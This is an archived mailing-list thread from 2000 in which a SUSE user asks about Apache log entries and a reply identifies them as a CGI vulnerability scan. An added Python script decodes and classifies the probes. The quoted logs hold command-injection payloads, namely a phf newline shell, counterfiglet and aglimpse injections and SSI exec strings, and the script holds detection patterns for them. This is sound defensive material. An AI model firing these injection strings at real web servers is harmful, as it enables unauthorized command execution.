Subject: Re: [suse-security] Web server security holes ?
From: Francisco M. Marzoa Alonso (fmmarzoa@idecnet.com)
Date: Wed Apr 05 2000 - 03:06:50 CDT
It seems to me like a bad guy was scanning your web server for vulnerable CGI scripts, but don't panic, he couldn't find anything.
Have a good one.
Marc Baaden wrote:
> Dear All,
>
> I am quite concerned about security, and I think my machine is doing well
> with respect to all usual services as telnet, FTP, etc...
>
> Unfortunately I am not very experienced with web servers, and have the standard
> features of SuSE 6.3 installed (Apache, I think).
> On two of my machines I got the following log entries in http.acces_log/
> error_log
>
> - What does it mean ?
> - Is it dangerous for the machine ?
> - Can I further secure my machine ?
> PS: I do NOT need the machine being accessible by external machines in HTTP
>
> Thank you for explaining these things to me ...
>
> 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
> 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
> 128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376
> 128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482
> 128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
> 128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346
> 128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
> 128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279
> 128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282
> 128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET /%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316
>
> [Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet
> [Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/phf
> [Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse
> [Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/perl
> [Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/sh
> [Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/query
>
> [Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux) mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations
> [Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
> [
>
> Marc Baaden
> --
> Marc Baaden - Labo MSM (UMR 7551) - http://crypt.u-strasbg.fr/marc
> mailto:baaden@chimie.u-strasbg.fr - FAX (+49) 89 24 43 1 68 68
> ICQ# 11466242 - Tel: (+33) 3 88 41 60 86 or (+33) 6 09 84 32 17
>
--
Francisco M. Marzoa Alonso
Nuevo Mundo - Dpto. Informático        ICQ#: 62850923
Henri Dunant, 19 - 28036 Madrid        tfno: +34 91 343 18 40 ext. 207
España / Spain                         fax: +34 91 350 28 45
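The kind of triage discussed in this thread, as an added example that is not part of either poster's message: it percent-decodes each request in an Apache access log, tags the CGI probe patterns visible in the quoted entries, and separates probes the server answered with a 2xx status from ones it rejected. The rule names, `classify` and `triage` are assumptions made for this sketch, and the rule list covers only the patterns seen in this log.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3}) \S+$')

# Heuristic rules written from the probes quoted in this thread; not a complete set.
RULES = [
    ("interpreter-in-cgi-bin", re.compile(r"^/cgi-bin/(perl|sh)\b")),
    ("newline-injection", re.compile(r"[\r\n]")),
    ("shell-metachar", re.compile(r"[;|`]|\$\w")),
    ("ssi-exec", re.compile(r"<!--#exec", re.I)),
    ("sample-cgi", re.compile(r"^/cgi-bin/(test-cgi|phf)\b")),
]

def classify(line):
    """Return (client, status, decoded_target, tags), or None if the line is not CLF."""
    m = CLF.match(line.strip())
    if not m:
        return None
    client, target, status = m.groups()
    decoded = unquote(target)  # %0a -> newline, %3C -> '<', so rules see the real bytes
    tags = [name for name, rx in RULES if rx.search(decoded)]
    return client, int(status), decoded, tags

def triage(lines):
    """Split probe hits into requests the server answered (2xx) and ones it rejected."""
    answered, rejected = [], []
    for line in lines:
        hit = classify(line)
        if hit and hit[3]:
            (answered if 200 <= hit[1] < 300 else rejected).append(hit)
    return answered, rejected

# Six entries copied from the access log quoted above, plus one constructed benign line.
SAMPLE = [
    r'131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280',
    r'128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376',
    r'128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482',
    r'128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346',
    r'128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279',
    r'128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282',
    r'192.0.2.10 - - [21/Mar/2000:09:00:00 +0100] "GET /index.html HTTP/1.0" 200 1024',  # constructed
]

if __name__ == "__main__":
    answered, rejected = triage(SAMPLE)
    for label, hits in (("ANSWERED", answered), ("rejected", rejected)):
        for client, status, target, tags in hits:
            print(f"{label} {status} {client} {','.join(tags)} {target!r}")
```

On these entries the only probe reported as answered is the POST to /cgi-bin/test-cgi (status 200); the other five returned 404.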